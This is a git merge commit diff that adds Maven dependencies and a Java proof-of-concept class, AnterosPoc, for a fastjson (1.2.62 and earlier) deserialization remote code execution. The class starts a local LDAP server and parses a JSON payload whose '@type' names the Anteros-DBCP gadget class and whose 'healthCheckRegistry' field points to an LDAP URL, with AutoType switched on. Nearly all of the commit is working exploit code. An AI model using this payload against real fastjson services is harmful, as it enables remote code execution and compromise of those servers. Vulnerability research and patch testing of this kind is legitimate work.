Merge branch 'feat/new-anteros-gadget-fastjson'

“threedr3am” · “threedr3am” · commit 84e9dbddaa25 · 2020-03-02T13:14:10.000+08:00
# Conflicts:
#	fastjson/pom.xml
diff --git a/fastjson/pom.xml b/fastjson/pom.xml
@@ -62,5 +62,24 @@
       <artifactId>javaee-api</artifactId>
       <version>8.0.1</version>
     </dependency>
+
+    <!-- https://mvnrepository.com/artifact/com.codahale.metrics/metrics-healthchecks -->
+    <dependency>
+      <groupId>com.codahale.metrics</groupId>
+      <artifactId>metrics-healthchecks</artifactId>
+      <version>3.0.2</version>
+    </dependency>
+    <!-- https://mvnrepository.com/artifact/br.com.anteros/Anteros-Core -->
+    <dependency>
+      <groupId>br.com.anteros</groupId>
+      <artifactId>Anteros-Core</artifactId>
+      <version>1.2.1</version>
+    </dependency>
+    <!-- https://mvnrepository.com/artifact/br.com.anteros/Anteros-DBCP -->
+    <dependency>
+      <groupId>br.com.anteros</groupId>
+      <artifactId>Anteros-DBCP</artifactId>
+      <version>1.0.1</version>
+    </dependency>
   </dependencies>
 </project>
diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/AnterosPoc.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/AnterosPoc.java
@@ -0,0 +1,47 @@
+package com.threedr3am.bug.fastjson;
+
+import com.alibaba.fastjson.JSON;
+import com.alibaba.fastjson.parser.ParserConfig;
+import com.threedr3am.bug.common.server.LdapServer;
+
+/**
+ * fastjson <= 1.2.62 RCE，需要开启AutoType
+ *
+ * Anteros-DBCP依赖的gadget
+ *
+ *     <dependency>
+ *       <groupId>com.codahale.metrics</groupId>
+ *       <artifactId>metrics-healthchecks</artifactId>
+ *       <version>3.0.2</version>
+ *     </dependency>
+ *
+ *     <dependency>
+ *       <groupId>br.com.anteros</groupId>
+ *       <artifactId>Anteros-Core</artifactId>
+ *       <version>1.2.1</version>
+ *     </dependency>
+ *
+ *     <dependency>
+ *       <groupId>br.com.anteros</groupId>
+ *       <artifactId>Anteros-DBCP</artifactId>
+ *       <version>1.0.1</version>
+ *     </dependency>
+ *
+ * @author threedr3am
+ */
+public class AnterosPoc {
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) {
+    ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
+
+    String payload = "{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}";//ldap方式
+    JSON.parse(payload);
+  }
+}
